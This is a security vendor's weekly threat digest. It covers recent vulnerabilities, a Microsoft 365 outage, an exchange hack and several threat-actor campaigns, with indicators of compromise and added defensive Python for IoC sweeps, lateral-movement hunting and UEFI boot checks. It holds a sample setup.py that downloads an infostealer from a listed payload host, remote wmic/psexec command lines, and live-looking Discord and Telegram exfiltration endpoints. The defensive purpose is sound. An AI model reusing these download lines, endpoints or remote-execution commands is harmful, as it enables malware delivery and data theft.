Weekly Threat Landscape Digest – Week 48

HawkEye Managed XDR

This week’s cybersecurity digest highlights multiple critical vulnerabilities and threat actor activities, emphasizing the importance of proactive mitigation strategies.

Vulnerabilities

  1. Multiple Vulnerabilities in Apache Tomcat

Several vulnerabilities have been disclosed in Apache Tomcat. Depending on the flaw and the server's configuration, impact ranges from remote code execution to exposure of data and service instability. Upgrade to the fixed Tomcat releases named in the project's security advisories.

  2. Google Chrome Updates

Google has patched a high-severity vulnerability in Chrome's V8 JavaScript engine. Update Chrome to the release noted in the advisory below and restart the browser so the new build takes effect.

Reference: https://chromereleases.googleblog.com/2024/11/chrome-for-android-update_19.html

  3. Oracle Agile PLM Vulnerability

A critical vulnerability in Oracle Agile PLM may allow a remote attacker to read files from the affected server. Apply Oracle's fix and review access logs on exposed Agile PLM instances.

  4. Trend Micro Deep Security Vulnerability

An OS command injection vulnerability in the Trend Micro Deep Security Agent allows an attacker to execute arbitrary code on affected hosts. Update agents to the fixed build.

  5. 7-Zip High-Severity Vulnerability

A vulnerability in 7-Zip's Zstandard decompression routine can lead to remote code execution when a user opens a crafted archive. 7-Zip has no automatic update mechanism, so affected installations must be upgraded manually.

  6. Kubernetes High-Severity Vulnerability

A flaw in the Kubernetes gitRepo volume type allows a user who can create pods with such volumes to execute arbitrary commands on the node, outside the container boundary. The gitRepo volume type is deprecated: migrate to an init container that clones the repository, and block gitRepo volumes with an admission policy.

  7. Veritas Enterprise Vault Vulnerabilities

Critical remote code execution vulnerabilities in Veritas Enterprise Vault stem from insecure deserialization of data received on the application's .NET Remoting TCP ports; an attacker who can reach those ports can send malicious serialized objects to the server. Restrict network access to the ports to trusted hosts and apply Veritas' updates.

  8. AnyDesk Zero-Day Vulnerability

A flaw in AnyDesk's "Allow Direct Connections" feature exposes users' public and private IP addresses to a remote peer. Disable direct connections until a fix is available.

  9. FluentSMTP Plugin Vulnerability

A vulnerability in the FluentSMTP WordPress plugin allows unauthenticated attackers to execute arbitrary code on affected sites. Update the plugin on all WordPress installations that use it.

  10. Vulnerability in Palo Alto Networks GlobalProtect App

An insufficient certificate validation issue in the Palo Alto Networks GlobalProtect app lets the app be connected to an arbitrary server. An attacker positioned to redirect that connection (for example a local non-administrative user on the endpoint, or someone on the same network) could use it to install a malicious root certificate on the endpoint and then run software signed by that certificate.

  • CVE Details:
    • CVE-2024-5921: Insufficient certificate validation (Medium, CVSS 6.8).
  • Affected Versions:
    • GlobalProtect App 6.3: All versions.
    • GlobalProtect App 6.2 (Windows): Versions < 6.2.6.
    • GlobalProtect App 6.2 (macOS/Linux): All versions.
    • GlobalProtect App 6.1 and earlier: All versions.
    • GlobalProtect UWP App (Windows): All versions.
  • Mitigation:
    • Windows: upgrade GlobalProtect App 6.2 to 6.2.6 or later. For other platforms and branches, track the Palo Alto Networks advisory for fixed releases and interim workarounds.
    • Treat newly installed root certificates in endpoint trust stores, and GlobalProtect connections to portals outside your known set, as detection signals.

Advisories

  1. Microsoft 365 Outage

A widespread outage affected Microsoft 365 services, including Exchange Online, Teams, and SharePoint. Users experienced disruptions in accessing emails, collaborating on documents, and participating in virtual meetings. Microsoft attributed the issue to a networking configuration error, which has since been resolved.

Mitigation:

  • Organizations should implement contingency plans to maintain business continuity during service outages.
  • Regularly back up critical data to ensure accessibility during unforeseen disruptions.


Incidents

  1. XT Exchange Hacked

Cryptocurrency exchange XT.com reported an abnormal wallet transfer resulting in a loss of approximately $1.7 million. The breach led to the suspension of all crypto withdrawals, with the exchange citing wallet upgrades and maintenance as the reason. Blockchain security firm PeckShield noted that the stolen funds were converted into Ethereum.

Mitigation:

  • Users should exercise caution when holding funds on centralized exchanges due to recurring hacks.
  • Regularly monitor account activity and enable security features such as two-factor authentication.


Threat Actors

  1. MUT-8694: NPM and PyPI Malicious Campaign

A supply-chain campaign against the npm and PyPI registries has been attributed to a threat actor tracked as MUT-8694. The actor publishes typosquatted packages (names that mimic legitimate ones) which fetch and run infostealers, including Blank Grabber and Skuld Stealer, primarily targeting Windows users. The indicators below show payloads staged on GitHub and Replit, with Discord webhooks and Telegram bot endpoints used for command and exfiltration.

Indicators of Compromise (IoCs):

File Hashes (SHA256):

  • CBLines.exe (Blank Grabber): 9247039186ec01688d19be3ade8e18fa086301145b7c00cc24465147764c63b8
  • RobloxPlayerLauncher.exe: 5c4c6ef3aed460f7ea15025bc160768e00c988747b943c99faf9f09b73f86e18
  • cmd.exe: b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a92

Malicious URLs:

  • https://github[.]com/holdthatcode/e/raw/main/CBLines.exe
  • https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/skuld
  • https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/blank
  • https://eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev/empyrean
  • https://discord[.]com/api/webhooks/1296197362108338248/k492vQ1I3SDXcmvWcvsy2EcSUzrwhNmILrYhR3qSF8R7tkcE-C5GgZSxuS3IlNschBWg
  • https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getUpdates
  • https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getWebhookInfo
  • https://api.telegram[.]org/bot7546407054:AAGwtti94gRjmoXnuSTcg7u0_qsGj7uoXqo/getMe

Mitigation:

  • Verify package names and publishers before adding dependencies, pin exact versions, and review install-time scripts (setup.py, package.json lifecycle hooks) for downloads from unexpected hosts.
  • Keep development environments patched, and alert on developer workstations contacting the payload hosts or messaging endpoints listed above.
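The following is an added example, not code from the original digest or from the researchers who reported the campaign: a small sweep that hashes every file under a dependency tree against the SHA256 IoCs above, searches file contents for the listed payload and exfiltration URLs (kept defanged in source), and flags package names within one edit of a popular name, which is the classic typosquat pattern the actor relies on. The sample setup.py it builds and the "popular package" list are constructed assumptions for illustration.

```python
"""IoC sweep and typosquat check for the MUT-8694 npm/PyPI campaign.

Added example; not code from the original digest or from the researchers who
reported the campaign. The SHA256 values and URL fragments are the IoCs listed
above. The sample file and the 'popular package' list are constructed.
"""
import hashlib
import os
import tempfile
from typing import Dict, Iterable, List

# SHA256 IoCs from the digest (Blank Grabber / Skuld droppers).
IOC_SHA256 = {
    "9247039186ec01688d19be3ade8e18fa086301145b7c00cc24465147764c63b8",
    "5c4c6ef3aed460f7ea15025bc160768e00c988747b943c99faf9f09b73f86e18",
    "b3ce55c72f4e23252235f9698bd6078880ceaca310ba16ee859a5a2d6cc39a92",
}

# Payload-hosting and exfiltration endpoints from the digest, kept defanged in
# source and refanged only at match time so this file never holds a live URL.
IOC_URL_FRAGMENTS = [
    "github[.]com/holdthatcode/e/raw/main/CBLines.exe",
    "eed964e7-461c-4428-9c46-808d77ede57c-00-26f8c6izoatcc.worf.replit[.]dev",
    "discord[.]com/api/webhooks/1296197362108338248",
    "api.telegram[.]org/bot7546407054",
]


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".").replace("[dot]", ".")


def sweep(root: str, hashes: Iterable[str] = IOC_SHA256,
          fragments: Iterable[str] = IOC_URL_FRAGMENTS) -> List[Dict[str, str]]:
    """Walk `root` (e.g. node_modules or site-packages) and flag files whose
    SHA256 is a known IoC or whose bytes contain a known payload/C2 URL, which
    is where install hooks such as setup.py carry their download logic."""
    wanted = set(hashes)
    needles = [refang(f).encode() for f in fragments]
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            digest = hashlib.sha256(data).hexdigest()
            if digest in wanted:
                findings.append({"path": path, "type": "hash", "match": digest})
            for needle in needles:
                if needle in data:
                    findings.append({"path": path, "type": "url", "match": needle.decode()})
    return findings


def levenshtein(a: str, b: str) -> int:
    """Edit distance; typosquats usually sit one or two edits from the target."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


# Assumed set of widely used names an attacker would imitate (illustrative only).
POPULAR = {"requests", "urllib3", "colorama", "pillow", "lodash", "express", "axios"}


def typosquat_candidates(name: str, popular: Iterable[str] = POPULAR,
                         max_distance: int = 1) -> List[str]:
    """Popular names within `max_distance` edits of `name`, excluding an exact
    match. A hit means the dependency should be inspected before install."""
    name = name.lower()
    return sorted(p for p in popular if p != name and levenshtein(name, p) <= max_distance)


def build_sample_dir() -> Dict[str, str]:
    """Constructed sample: a setup.py whose install step downloads from the
    Replit host above. Returns the paths and the file's SHA256."""
    root = tempfile.mkdtemp(prefix="mut8694_")
    setup_py = os.path.join(root, "setup.py")
    body = ('import urllib.request\n'
            'URL = "https://%s/skuld"  # constructed sample\n'
            'urllib.request.urlretrieve(URL, "skuld.exe")\n' % refang(IOC_URL_FRAGMENTS[1]))
    with open(setup_py, "w") as fh:
        fh.write(body)
    return {"root": root, "setup_py": setup_py,
            "setup_py_sha256": hashlib.sha256(body.encode()).hexdigest()}


if __name__ == "__main__":
    sample = build_sample_dir()
    for hit in sweep(sample["root"]):
        print(f"{hit['type']:4} {hit['path']} -> {hit['match']}")
    print("typosquat check for 'requestz':", typosquat_candidates("requestz"))
```

Run it against a project's `node_modules` or a virtualenv's `site-packages` by calling `sweep()` on that directory; the typosquat check is meant to run on each new dependency name before it is added, not on the installed tree.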


  2. Microsoft Disrupts ONNX Phishing-as-a-Service

Microsoft disrupted the operations of ONNX (Caffeine/FUHRER), a phishing-as-a-service platform operational since 2017. The action included the seizure of 240 domains used to target Microsoft 365, Google, Dropbox, and other tech services with phishing attacks.

Key Tactics:

  • Quishing (QR Code Phishing): PDF attachments with malicious QR codes redirected victims to fake login pages.
  • 2FA Bypass: Kits included mechanisms to intercept two-factor authentication codes.
  • Obfuscation: Encrypted JavaScript evaded anti-phishing detection tools.

Outcome:

ONNX's activity dropped off in June 2024 after researchers publicly identified its operator, Abanoub Nady (MRxC0DER). Microsoft subsequently secured a court order to seize the phishing domains and sever the operator's access to the malicious infrastructure, preventing their reuse.

Mitigation:

  • Train employees to recognize phishing tactics, especially QR code-based attacks.
  • Avoid scanning QR codes from unknown sources and enforce MFA for accounts.


  3. Russia-Aligned TAG-110 Targets Asia and Europe

TAG-110, a Russia-aligned threat group linked to BlueDelta (APT28), has been conducting cyber-espionage campaigns against governments, human rights groups, and educational institutions in Central Asia, East Asia, and Europe. The group uses HATVIBE, an HTML Application (HTA) loader, and CHERRYSPY, a Python-based backdoor, to exfiltrate sensitive data and monitor victim systems.

Key Highlights:

  • Targets: Government entities, human rights groups, and educational institutions.
  • Malware Used:
    • HATVIBE: A loader delivered via phishing emails or by exploiting vulnerable public-facing services (e.g., Rejetto HTTP File Server). Uses obfuscation techniques such as VBScript encoding and XOR encryption.
    • CHERRYSPY: Complements HATVIBE for secure data exfiltration, using encryption methods like RSA and AES for C2 communication.
  • Impact: 62 victims across 11 countries, including Kazakhstan, Kyrgyzstan, and Uzbekistan, since July 2024.

Mitigation:

  • Deploy the published Snort, Suricata, and YARA rules for HATVIBE and CHERRYSPY.
  • Monitor for the reported IoCs and patch exposed services, in particular Rejetto HTTP File Server (CVE-2024-23692).
  • Train employees on phishing detection and enforce MFA.


  4. Chinese APT Group Earth Estries Targets Critical Infrastructure

Earth Estries, a Chinese advanced persistent threat (APT) group, has been actively targeting critical infrastructure sectors, including telecommunications, government entities, and NGOs, across regions like Asia-Pacific, the US, the Middle East, and South Africa. Using sophisticated malware like GHOSTSPIDER, SNAPPYBEE, and DEMODEX Rootkit, the group conducts prolonged cyber-espionage campaigns.

Key Insights

  • Primary Targets: Telecommunications providers, government agencies, technology firms, NGOs, and consulting companies.
  • Attack Techniques:
    • Exploiting vulnerabilities in public-facing servers for initial access.
    • Using living-off-the-land binaries (LOLBINs) such as WMIC.exe and PSEXEC.exe for lateral movement.
    • Deploying custom malware for persistence and espionage.
  • C&C Infrastructure: Complex operations with shared tools and domains overlapping with other Chinese APTs.

Malware Overview

  1. GHOSTSPIDER: Multi-modular backdoor with secure C&C communication via TLS.
  2. SNAPPYBEE: Advanced malware facilitating data exfiltration.
  3. DEMODEX Rootkit: Found in compromised vendor networks linked to telecommunications providers.

Indicators of Compromise (IoCs)

  • C&C Domains:
    • api[.]solveblemten[.]com
    • esh[.]hoovernamosong[.]com
  • IP Address:
    • 158.247.222[.]165
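The following is an added example, not code from the original digest or from Trend Micro. It turns the two observations above into hunting logic: the attack-technique bullets name WMIC.exe and PSEXEC.exe for lateral movement, so the process rules match only their remote-execution forms (wmic with /node: plus process call create; psexec with a \\host target) and ignore the common local uses of wmic; the IoC bullets give the C&C domains and IP, which are matched against DNS queries and answers. The event schema, the DNS log format and every sample record are constructed for illustration.

```python
"""Hunting logic for the Earth Estries tradecraft described above.

Added example; not code from the original digest or from Trend Micro. The two
C&C domains and the IP address are the IoCs listed above. The event schema, the
DNS log format and all sample records are constructed for illustration.
"""
import re
from typing import Dict, List, Optional

C2_DOMAINS = {"api[.]solveblemten[.]com", "esh[.]hoovernamosong[.]com"}
C2_IPS = {"158.247.222[.]165"}


def refang(indicator: str) -> str:
    return indicator.replace("[.]", ".").replace("[dot]", ".")


C2_DOMAIN_SET = {refang(d) for d in C2_DOMAINS}
C2_IP_SET = {refang(i) for i in C2_IPS}

# Remote-execution forms of the LOLBINs named in the report. Plain local use of
# wmic (e.g. 'wmic os get caption') is common and deliberately not matched:
# /node: targets another host, and psexec always takes a \\host argument.
LOLBIN_RULES = [
    ("wmic_remote_process_create",
     re.compile(r"\bwmic(\.exe)?\b.*?/node:\S+.*?\bprocess\s+call\s+create\b", re.I)),
    ("psexec_remote_exec",
     re.compile(r"\bpsexec(64)?(\.exe)?\b.*?\\\\\S+", re.I)),
]


def check_process_event(event: Dict[str, str]) -> List[str]:
    """event: {'host', 'user', 'cmdline'} (constructed schema, the fields a
    process-creation event would provide). Returns names of matching rules."""
    cmdline = event.get("cmdline", "")
    return [name for name, rx in LOLBIN_RULES if rx.search(cmdline)]


def check_dns_line(line: str) -> Optional[str]:
    """line: '<timestamp> <client> <query> <answer>' (constructed format).
    Returns the C&C domain (also for its subdomains) or resolved IP that matched."""
    parts = line.split()
    if len(parts) < 4:
        return None
    query, answer = parts[2].lower().rstrip("."), parts[3]
    for domain in C2_DOMAIN_SET:
        if query == domain or query.endswith("." + domain):
            return domain
    if answer in C2_IP_SET:
        return answer
    return None


# Constructed sample telemetry: two remote-execution events, one benign wmic use.
SAMPLE_EVENTS = [
    {"host": "ws-01", "user": "CORP\\svc-backup",
     "cmdline": r'wmic /node:"10.10.1.20" /user:CORP\svc-backup process call create "cmd.exe /c whoami"'},
    {"host": "ws-02", "user": "CORP\\jdoe",
     "cmdline": r"psexec.exe \\10.10.1.21 -s cmd.exe"},
    {"host": "ws-03", "user": "CORP\\helpdesk",
     "cmdline": "wmic os get caption"},
]
SAMPLE_DNS = [
    "2024-11-25T10:02:11Z 10.10.1.20 api.solveblemten.com 158.247.222.165",
    "2024-11-25T10:02:12Z 10.10.1.21 www.example.com 93.184.216.34",
    "2024-11-25T10:02:13Z 10.10.1.22 cdn.example.net 158.247.222.165",
]


def hunt(events=SAMPLE_EVENTS, dns_lines=SAMPLE_DNS) -> Dict[str, list]:
    """Hosts with LOLBIN remote-execution hits, and clients whose DNS traffic
    named or resolved to the C&C infrastructure."""
    lolbin = [(e["host"], names) for e in events if (names := check_process_event(e))]
    c2 = [(line.split()[1], match) for line in dns_lines if (match := check_dns_line(line))]
    return {"lolbin": lolbin, "c2": c2}


if __name__ == "__main__":
    for key, rows in hunt().items():
        for row in rows:
            print(key, row)
```

Remote wmic and psexec use is legitimate in many environments, so the process rules are a triage signal to correlate with the account, source host and time, not a standalone alert; the third sample record shows the benign local wmic invocation they deliberately skip. The DNS check also fires when an unrelated name resolves to the listed IP (third DNS line), which catches infrastructure reuse under a new domain.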

Reference: https://industrialcyber.co/ransomware/chinese-apt-group-earth-estries-targets-critical-infrastructure-sectors-with-advanced-cyber-attacks/

  5. RomCom APT Exploits Firefox and Windows Zero-Day Vulnerabilities

The RomCom APT Group (aka Storm-0978, Tropical Scorpius) exploited two zero-day vulnerabilities to deploy the RomCom backdoor:

  • CVE-2024-9680 (Firefox): Use-after-free bug in the animation timeline feature (Critical, CVSS 9.8).
  • CVE-2024-49039 (Windows): Privilege escalation in Task Scheduler (High, CVSS 8.8).

Attack Details

Method: Victims were redirected to fake websites (e.g., economistjournal[.]cloud) hosting exploits.

Outcome: Sandbox escape, privilege escalation, and installation of RomCom backdoor for command execution and payload delivery.

IOCs:

  • economistjournal[.]cloud
  • redjournal[.]cloud

References:

https://thehackernews.com/2024/11/romcom-exploits-zero-day-firefox-and.html

https://www.infosecurity-magazine.com/news/romcom-apt-zeroday-flaws-firefox/ 

  6. Bootkitty: First UEFI Bootkit Targeting Linux

Bootkitty, discovered in November 2024, is the first UEFI bootkit observed targeting Linux. Its authors refer to themselves as "BlackCat" in the binary; there is no evidence tying it to the ALPHV/BlackCat ransomware group, and it is assessed as a proof of concept rather than malware seen in real intrusions. The bootkit is signed with a self-signed certificate, so on a system with Secure Boot enforcing it can only run if an attacker-controlled certificate has been enrolled or firmware verification has been bypassed (the LogoFAIL path below). Once running, it hooks GRUB and patches the kernel's signature checks to load its own components.

Key Details

  • Purpose: Disable kernel signature checks and load malicious modules.
  • Exploited Vulnerability:
    • CVE-2023-40238 (LogoFAIL): A firmware image-parser flaw abused via tampered BMP logo images to inject a rogue certificate into the MOK list and so bypass Secure Boot.
  • Targets: Limited to certain Ubuntu distributions and hardware from Acer, HP, Fujitsu, and Lenovo.
  • Artifacts: Includes bootkit.efi, kernel module BCDropper, and ELF binary BCObserver.

Mitigation

  • Keep UEFI Secure Boot enforcing (SecureBoot=1, SetupMode=0), password-protect firmware setup, and review the MOK and db key lists for certificates you did not enroll.
  • Apply the firmware updates for CVE-2023-40238 from Acer, HP, Fujitsu, and Lenovo.
  • Baseline the EFI System Partition and alert on new or modified .efi files (including bootkit.efi) and on unexpected kernel modules such as BCDropper; if compromise is confirmed, reflash firmware from a vendor image rather than relying on an in-place clean-up.
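The following is an added example, not code from the original digest, ESET or Binarly; it implements the host-side checks the mitigation list calls for. It decodes the SecureBoot and SetupMode variables the way efivarfs exposes them (a 4-byte attribute word followed by the 1-byte value) and reports whether Secure Boot is actually enforcing, audits a list of EFI System Partition paths for the reported artifact name and for .efi files outside an allowlist, and diffs ESP file hashes against a recorded baseline. The allowlist (a stock Ubuntu layout), the required-file set, the /boot/efi mount point and all sample values are constructed assumptions.

```python
"""Boot-chain checks a Linux host would run in response to the Bootkitty report.

Added example; not code from the original digest, ESET or Binarly. The
allowlist (assumed stock Ubuntu ESP layout), the required-file set, the ESP
mount point and all sample data are constructed assumptions.
"""
import hashlib
import os
from typing import Dict, List, Optional

EFIVARS = "/sys/firmware/efi/efivars"
EFI_GLOBAL_VARIABLE_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"


def decode_efivar(raw: bytes) -> Optional[int]:
    """efivarfs prefixes variable data with a 4-byte attribute word; for
    SecureBoot and SetupMode the data is a single byte (1 = on)."""
    return raw[4] if len(raw) >= 5 else None


def read_efivar(name: str, guid: str = EFI_GLOBAL_VARIABLE_GUID) -> Optional[int]:
    try:
        with open(os.path.join(EFIVARS, f"{name}-{guid}"), "rb") as fh:
            return decode_efivar(fh.read())
    except OSError:
        return None  # legacy BIOS boot, or efivarfs not mounted


def secure_boot_state(secure_boot: Optional[int], setup_mode: Optional[int]) -> str:
    """Only SecureBoot=1 with SetupMode=0 is enforcing. In setup mode the key
    databases are writable, so an attacker-enrolled key would make a
    self-signed loader like Bootkitty's trusted."""
    if secure_boot is None:
        return "unknown (no efivarfs)"
    if secure_boot == 1 and setup_mode == 0:
        return "enforcing"
    if secure_boot == 1:
        return "enabled but in setup mode"
    return "disabled"


# Assumed stock Ubuntu ESP layout, lower-cased because FAT is case-insensitive.
ESP_ALLOWLIST = {
    "efi/boot/bootx64.efi", "efi/boot/fbx64.efi", "efi/boot/mmx64.efi",
    "efi/ubuntu/shimx64.efi", "efi/ubuntu/grubx64.efi", "efi/ubuntu/mmx64.efi",
}
ESP_REQUIRED = {"efi/ubuntu/shimx64.efi", "efi/ubuntu/grubx64.efi"}
KNOWN_BAD_NAMES = {"bootkit.efi"}  # artifact name from the report


def audit_esp_paths(paths: List[str]) -> Dict[str, List[str]]:
    """Classify relative ESP paths: known-bad names, .efi files not on the
    allowlist, and expected loaders that are missing (a replaced or renamed
    shim/GRUB is as suspicious as an extra file)."""
    norm = {p.replace("\\", "/").lstrip("/").lower() for p in paths}
    known_bad = sorted(p for p in norm if os.path.basename(p) in KNOWN_BAD_NAMES)
    unexpected = sorted(p for p in norm
                        if p.endswith(".efi") and p not in ESP_ALLOWLIST and p not in known_bad)
    missing = sorted(r for r in ESP_REQUIRED if r not in norm)
    return {"known_bad": known_bad, "unexpected_efi": unexpected, "missing_expected": missing}


def hash_tree(root: str) -> Dict[str, str]:
    """SHA256 of every file under the mounted ESP, keyed by lower-cased relative path."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/").lower()
            with open(path, "rb") as fh:
                digests[rel] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_baseline(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare a recorded known-good ESP hash set with the current one."""
    return {
        "changed": sorted(p for p in baseline if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


if __name__ == "__main__":
    print("Secure Boot:", secure_boot_state(read_efivar("SecureBoot"), read_efivar("SetupMode")))
    esp = "/boot/efi"  # assumed mount point
    if os.path.isdir(esp):
        current = hash_tree(esp)
        print(audit_esp_paths(list(current)))
```

Record `hash_tree()` output once from a known-good machine and keep it off-host; a later `diff_baseline()` showing a changed shim or GRUB, or an added .efi such as bootkit.efi, is the anomaly the mitigation list refers to. Note that these checks read what the running OS can see, so on a host where the boot chain is already subverted a reflash from a vendor image, not a clean diff, is the only trustworthy answer.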



© 2024 HawkEye – Managed CSOC and XDR powered by DTS Solution. All Rights Reserved.